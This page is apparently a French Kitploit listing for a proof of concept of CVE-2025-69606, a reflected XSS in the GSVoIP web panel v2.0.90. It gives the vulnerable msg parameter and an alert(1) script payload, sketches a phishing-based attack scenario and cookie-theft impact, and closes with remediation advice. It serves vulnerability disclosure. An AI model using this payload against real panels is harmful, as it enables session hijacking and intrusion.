Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-69606-GSVoIP-XSS — Preuve de concept pour une vulnérabilité XSS réfléchie (CVE-2025-69606) dans le panneau Web GSVoIP v2.0.90, démontrant l'exécution de JavaScript arbitraire non authentifiée via le paramètre msg. | Kitploit
Outils/GitHubGitHub/razielx64/cve-2025-69606-gsvoip-xss
Analyse des VulnérabilitésExploitation d'Applications WebHameçonnageSécurité WebIngénierie SocialeApprentissage et Éducation
GitHubrazielx64/cve-2025-69606-gsvoip-xss

CVE-2025-69606-GSVoIP-XSS

Preuve de concept pour une vulnérabilité XSS réfléchie (CVE-2025-69606) dans le panneau Web GSVoIP v2.0.90, démontrant l'exécution de JavaScript arbitraire non authentifiée via le paramètre msg.

Voir le dépôt
5il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-69606 — XSS reflété dans le panneau Web GSVoIP

Gravité : Moyenne  |  CWE : CWE-79  |  Authentification requise : Non  |  Vecteur : À distance


Résumé

Une vulnérabilité de Cross-Site Scripting (XSS) reflété a été identifiée dans le panneau Web GSVoIP (v2.0.90). Le paramètre msg du point de terminaison d'erreur ne nettoie pas les entrées contrôlées par l'utilisateur avant de les refléter dans la réponse HTML, permettant l'exécution arbitraire de JavaScript dans le navigateur de la victime.


Produit concerné

ChampDétails
ProduitPanneau Web GSVoIP
Version2.0.90 (probablement versions antérieures)
FournisseurSolutions VoIP (GS Solutions)
CWECWE-79 — Cross-Site Scripting
Vecteur d'attaqueRéseau
AuthentificationNon requise

Point de terminaison vulnérable

root@kitploit:~
GET /painel/gateways.php/error?msg=<payload>

Le paramètre msg est reflété directement dans la réponse HTML sans nettoyage ni encodage de sortie.


Preuve de concept

Charge utile

root@kitploit:~
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E

Décodée :

root@kitploit:~
<script>alert(1)</script>

Résultat

Lorsque l'URL forgée est consultée, la charge utile injectée s'exécute dans le navigateur de la victime :

root@kitploit:~
alert(1)

Scénario d'attaque

  1. L'attaquant crée une URL malveillante contenant la charge utile XSS dans le paramètre msg.
  2. La victime est amenée à cliquer sur le lien (via hameçonnage, ingénierie sociale, etc.).
  3. La page se charge et le JavaScript injecté s'exécute dans le contexte du navigateur de la victime — aucune authentification requise.

Impact

  • Exécution arbitraire de JavaScript dans le navigateur de la victime
  • Détournement de session via le vol de cookies
  • Attaques d'hameçonnage et d'ingénierie sociale
  • Exfiltration de données sensibles
  • Défacement de contenu dans le contexte de l'application

Recommandations

  • Encodage de sortie : encoder toutes les entrées fournies par l'utilisateur avant de les afficher dans les réponses HTML (encodage d'entités HTML au minimum).
  • Template sécurisé : utiliser un moteur de template avec échappement automatique activé.
  • Politique de sécurité du contenu (CSP) : implémenter une CSP stricte avec des directives script-src restrictives.
  • Validation des entrées : rejeter ou supprimer les paramètres contenant des balises HTML ou des séquences de script au niveau de l'entrée.

Calendrier de divulgation

ÉtapeÉvénement
1Vulnérabilité découverte et signalée par Luiz Eduardo
2CVE assigné : CVE-2025-69606
3Divulgation publique

Crédits

Découverte et signalée par Luiz Eduardo


CVE-2025-69606 · CWE-79 · Panneau Web GSVoIP v2.0.90

Télécharger l’outil